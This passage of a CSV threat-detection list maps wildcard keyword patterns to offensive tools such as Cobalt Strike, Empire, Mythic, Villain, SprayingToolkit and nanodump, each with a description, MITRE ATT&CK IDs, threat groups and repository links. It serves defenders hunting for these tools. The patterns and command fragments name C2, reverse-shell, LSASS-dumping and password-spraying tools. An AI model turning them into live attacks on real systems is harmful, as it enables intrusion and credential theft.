TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*SpawnAsShellcodeManager*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*SpawneRv6yTYhShell*,offensive_tool_keyword,Villain,Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/t3l3machus/Villain,1,1,N/A,10,10,3252,534,2023-08-08T06:24:24Z,2022-10-25T22:02:59Z -*SpawnPPIDAgentManager*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*SpawnShellcode.cs*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*SpawnShellcodeManager*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*SpawnTheThing(*,offensive_tool_keyword,cobaltstrike,EDR Evasion - Combination of SwampThing - TikiTorch,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rkervella/CarbonMonoxide,1,0,N/A,10,10,21,12,2020-05-28T10:40:20Z,2020-05-15T09:32:25Z -*spawnto *.exe,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*spawnto */path *,offensive_tool_keyword,HardHatC2,A C# Command & Control framework,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/DragoQCC/HardHatC2,1,0,N/A,10,10,825,133,2023-09-06T05:17:05Z,2022-12-08T19:40:47Z -*spawnto_x64 -Application *,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,0,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*'spawnto_x64'*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*spawnto_x64.py*,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,1,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*spawnto_x86 -Application*,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,0,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*'spawnto_x86'*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*spawnto_x86.py*,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,1,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*specialtokengroupprivs.py*,offensive_tool_keyword,silenttrinity,SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.,T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018,TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/SILENTTRINITY,1,1,N/A,N/A,10,2070,413,2023-07-08T19:10:18Z,2018-09-25T15:17:30Z -*Spel_RCE_Bash_EXP.py*,offensive_tool_keyword,POC,RCE PoC of 0-day Vulnerability found in Spring Cloud (SPEL),T1059 - T1210 - T1507,TA0002 - TA0040 - TA0043,N/A,N/A,Exploitation tools,https://github.com/chaosec2021/Spring-cloud-function-SpEL-RCE,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Spel_RCE_POC.py*,offensive_tool_keyword,POC,RCE PoC of 0-day Vulnerability found in Spring Cloud (SPEL),T1059 - T1210 - T1507,TA0002 - TA0040 - TA0043,N/A,N/A,Exploitation tools,https://github.com/chaosec2021/Spring-cloud-function-SpEL-RCE,1,1,N/A,N/A,,N/A,,, -*spiderfoot -l 127.0.0.1:*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*spiderfoot-cli -s http*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*-SpiderFoot-correlations.csv*,offensive_tool_keyword,spiderfoot,The OSINT Platform for Security Assessments,T1595 - T1595.002 - T1596 - T1591 - T1591.002,TA0043 ,N/A,N/A,Information Gathering,https://www.spiderfoot.net/,1,0,N/A,6,10,N/A,N/A,N/A,N/A -*spiderfoot-master*,offensive_tool_keyword,spiderfoot,The OSINT Platform for Security Assessments,T1595 - T1595.002 - T1596 - T1591 - T1591.002,TA0043 ,N/A,N/A,Information Gathering,https://www.spiderfoot.net/,1,1,N/A,6,10,N/A,N/A,N/A,N/A -*SpiderLabs/DoHC2*,offensive_tool_keyword,DoHC2,DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/SpiderLabs/DoHC2,1,1,N/A,10,10,432,99,2020-08-07T12:48:13Z,2018-10-23T19:40:23Z -*SpiderLabs/Responder*,offensive_tool_keyword,responder,LLMNR. NBT-NS and MDNS poisoner,T1557.001 - T1171 - T1547.011,TA0011 - TA0005 - TA0003,N/A,N/A,Sniffing & Spoofing,https://github.com/SpiderLabs/Responder,1,1,N/A,N/A,10,4198,1633,2020-06-15T18:07:44Z,2012-10-24T14:35:12Z -*spindrift.py *--target *,offensive_tool_keyword,SprayingToolkit,Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient,T1110 - T1078 - T1133 - T1061,TA0001 - TA0002 - TA0003,N/A,N/A,Credential Access,https://github.com/byt3bl33d3r/SprayingToolkit,1,0,N/A,10,10,1352,268,2022-10-17T01:01:57Z,2018-09-13T09:52:11Z -*spindrift.py --domain*,offensive_tool_keyword,SprayingToolkit,Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient,T1110 - T1078 - T1133 - T1061,TA0001 - TA0002 - TA0003,N/A,N/A,Credential Access,https://github.com/byt3bl33d3r/SprayingToolkit,1,0,N/A,10,10,1352,268,2022-10-17T01:01:57Z,2018-09-13T09:52:11Z -*SplashtopStreamer3500.exe* prevercheck *,greyware_tool_keyword,Splashtop,control remote machines- abused by threat actors,T1021.001 - T1078 - T1133 - T1112,TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010,N/A,N/A,RMM,https://thedfirreport.com/2023/09/25/from-screenconnect-to-hive-ransomware-in-61-hours/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*sploitus.com/exploit?id=6C1081C5-7938-5E83-9079-719C1B071FB5*,offensive_tool_keyword,POC,Automated PoC exploitation of CVE-2021-44521,T1548 - T1190,TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/QHpix/CVE-2021-44521,1,1,N/A,N/A,1,9,2,2022-02-24T12:04:40Z,2022-02-24T11:07:34Z -*splunk/upload_app_exec/*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*splunk_whisperer.py*,offensive_tool_keyword,SplunkWhisperer2,Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations,T1068 - T1059.003 - T1071.001,TA0003 - TA0002 - TA0011,N/A,N/A,Lateral Movement - Privilege Escalation,https://github.com/cnotin/SplunkWhisperer2,1,1,N/A,9,3,239,53,2022-09-30T16:41:17Z,2019-02-24T18:05:51Z -*splunk_whisperer-master*,offensive_tool_keyword,SplunkWhisperer2,Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations,T1068 - T1059.003 - T1071.001,TA0003 - TA0002 - TA0011,N/A,N/A,Lateral Movement - Privilege Escalation,https://github.com/cnotin/SplunkWhisperer2,1,1,N/A,9,3,239,53,2022-09-30T16:41:17Z,2019-02-24T18:05:51Z -*SplunkWhisperer2-master*,offensive_tool_keyword,SplunkWhisperer2,Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations,T1068 - T1059.003 - T1071.001,TA0003 - TA0002 - TA0011,N/A,N/A,Lateral Movement - Privilege Escalation,https://github.com/cnotin/SplunkWhisperer2,1,1,N/A,9,3,239,53,2022-09-30T16:41:17Z,2019-02-24T18:05:51Z -*-spn * -clsid * -shadowcred*,offensive_tool_keyword,KrbRelay,Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html,T1212 - T1558 - T1550,TA0001 - TA0004 -TA0006,N/A,N/A,Exploitation tools,https://github.com/cube0x0/KrbRelay,1,0,N/A,N/A,8,751,109,2022-05-29T09:45:03Z,2022-02-14T08:21:57Z -*spnroast_*.txt*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,1,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*spoof_wani*,offensive_tool_keyword,C2_Server,C2 server to connect to a victim machine via reverse shell,T1090 - T1090.001 - T1071 - T1071.001,TA0011 ,N/A,N/A,C2,https://github.com/reveng007/C2_Server,1,0,N/A,10,10,31,17,2022-02-27T02:00:02Z,2021-03-05T12:35:45Z -*spoof_wlan_creds*,offensive_tool_keyword,C2_Server,C2 server to connect to a victim machine via reverse shell,T1090 - T1090.001 - T1071 - T1071.001,TA0011 ,N/A,N/A,C2,https://github.com/reveng007/C2_Server,1,0,N/A,10,10,31,17,2022-02-27T02:00:02Z,2021-03-05T12:35:45Z -*--spoof-callstack *,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,0,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*SpooferHostsIgnore*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*SpooferHostsReply*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*SpooferIP*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*SpooferIPsIgnore*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*SpooferIPsReply*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*SpooferLearningDelay*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*SpooferLearningInterval*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - 